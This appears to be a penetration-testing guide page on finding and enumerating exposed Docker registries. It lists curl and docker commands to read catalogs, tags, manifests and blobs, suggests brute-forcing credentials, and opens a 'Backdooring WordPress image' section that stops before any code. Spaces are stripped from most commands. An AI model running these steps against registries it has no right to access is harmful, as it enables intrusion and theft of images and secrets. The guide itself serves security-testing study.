A storage and distribution system known as a Docker registry is in place for Docker images that are named and may come in multiple versions, distinguished by tags. These images are organized within Docker repositories in the registry, each repository storing various versions of a specific image. The functionality provided allows for images to be downloaded locally or uploaded to the registry, assuming the user has the necessary permissions.
DockerHub serves as the default public registry for Docker, but users also have the option to operate an on-premise version of the open-source Docker registry/distribution or opt for the commercially supported Docker Trusted Registry. Additionally, various other public registries can be found online.
To download an image from an on-premise registry, the following command is used:
dockerpullmy-registry:9000/foo/bar:2.1
This command fetches the foo/bar image version 2.1 from the on-premise registry at the my-registry domain on port 9000. Conversely, to download the same image from DockerHub, particularly if 2.1 is the latest version, the command simplifies to:
dockerpullfoo/bar
Default port: 5000
PORT STATE SERVICE VERSION
5000/tcp open http Docker Registry (API: 2.0)
Discovering
The easiest way to discover this service running is get it on the output of nmap. Anyway, note that as it's a HTTP based service it can be behind HTTP proxies and nmap won't detect it.
Some fingerprints:
If you access / nothing is returned in the response
Docker registry may also be configured to require authentication:
curl-khttps://192.25.197.3:5000/v2/_catalog#If Authentication required{"errors":[{"code":"UNAUTHORIZED","message":"authenticationrequired","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}#If no authentication required{"repositories":["alpine","ubuntu"]}
If the Docker Registry is requiring authentication you cantry to brute force it using this.
If you find valid credentials you will need to use them to enumerate the registry, in curl you can use them like this:
Once you obtained access to the docker registry here are some commands you can use to enumerate it:
#List repositoriescurl-shttp://10.10.10.10:5000/v2/_catalog{"repositories":["alpine","ubuntu"]}#Get tags of a repositorycurl-shttp://192.251.36.3:5000/v2/ubuntu/tags/list{"name":"ubuntu","tags":["14.04","12.04","18.04","16.04"]}#Get manifestscurl-shttp://192.251.36.3:5000/v2/ubuntu/manifests/latest{"schemaVersion":1,"name":"ubuntu","tag":"latest","architecture":"amd64","fsLayers": [ {"blobSum":"sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935" }, {"blobSum":"sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" }, {"blobSum":"sha256:e7c96db7181be991f19a9fb6975cdbbd73c65f4a2681348e63a141a2192a5f10" } ],"history": [ { "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container_config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:96c69e5db7e6d87db2a51d3894183e9e305a144c73659d5578d300bd2175b5d6 in /etc/network/if-post-up.d \"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"created\":\"2019-05-13T14:06:51.794876531Z\",\"docker_version\":\"18.09.4\",\"id\":\"911999e848d2c283cbda4cd57306966b44a05f3f184ae24b4c576e0f2dfb64d0\",\"os\":\"linux\",\"parent\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\"}"
}, {"v1Compatibility":"{\"id\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\",\"parent\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.510395965Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}" }, {"v1Compatibility":"{\"id\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.358250803Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:a86aea1f3a7d68f6ae03397b99ea77f2e9ee901c5c59e59f76f93adbb4035913 in / \"]}}" } ],"signatures": [ {"header":{"jwk":{"crv":"P-256","kid":"DJNH:N6JL:4VOW:OTHI:BSXU:TZG5:6VPC:D6BP:6BPR:ULO5:Z4N4:7WBX","kty":"EC","x":"leyzOyk4EbEWDY0ZVDoU8_iQvDcv4hrCA0kXLVSpCmg","y":"Aq5Qcnrd-6RO7VhUS2KPpftoyjjBWVoVUiaPluXq4Fg" },"alg":"ES256" },"signature":"GIUf4lXGzdFk3aF6f7IVpF551UUqGaSsvylDqdeklkUpw_wFhB_-FVfshodDzWlEM8KI-00aKky_FJez9iWL0Q","protected":"eyJmb3JtYXRMZW5ndGgiOjI1NjQsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMS0wMS0wMVQyMDoxMTowNFoifQ" } ]}#Download one of the previously listed blobscurlhttp://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935--outputblob1.tar#Inspect the insides of each blobtar-xfblob1.tar#After this,inspect the new folders and files created in the current directory
Note that when you download and decompress the blobs files and folders will appear in the current directory. If you download all the blobs and decompress them in the same folder they will overwrite values from the previously decompressed blobs, so be careful. It may be interesting to decompress each blob inside a different folder to inspect the exact content of each blob.
Enumeration using docker
#Once you know which images the server is saving (/v2/_catalog) you can pull themdockerpull10.10.10.10:5000/ubuntu#Check the commands used to create the layers of the imagedockerhistory10.10.10.10:5000/ubuntu#IMAGE CREATED CREATED BY SIZE COMMENT#ed05bef01522 2 years ago ./run.sh 46.8MB #<missing> 2 years ago /bin/sh -c #(nop) CMD ["./run.sh"] 0B #<missing> 2 years ago /bin/sh -c #(nop) EXPOSE 80 0B #<missing> 2 years ago /bin/sh -c cp $base/mysql-setup.sh / 499B #<missing> 2 years ago /bin/sh -c #(nop) COPY dir:0b657699b1833fd59… 16.2MB #Run and get a shelldockerrun-it10.10.10.10:5000/ubuntubash#Leave this shell runningdockerps#Using a different shelldockerexec-it7d3a81fe42d7bash#Get ash shell inside docker container
Backdooring WordPress image
In the scenario where you have found a Docker Registry saving a wordpress image you can backdoor it.
Create the backdoor: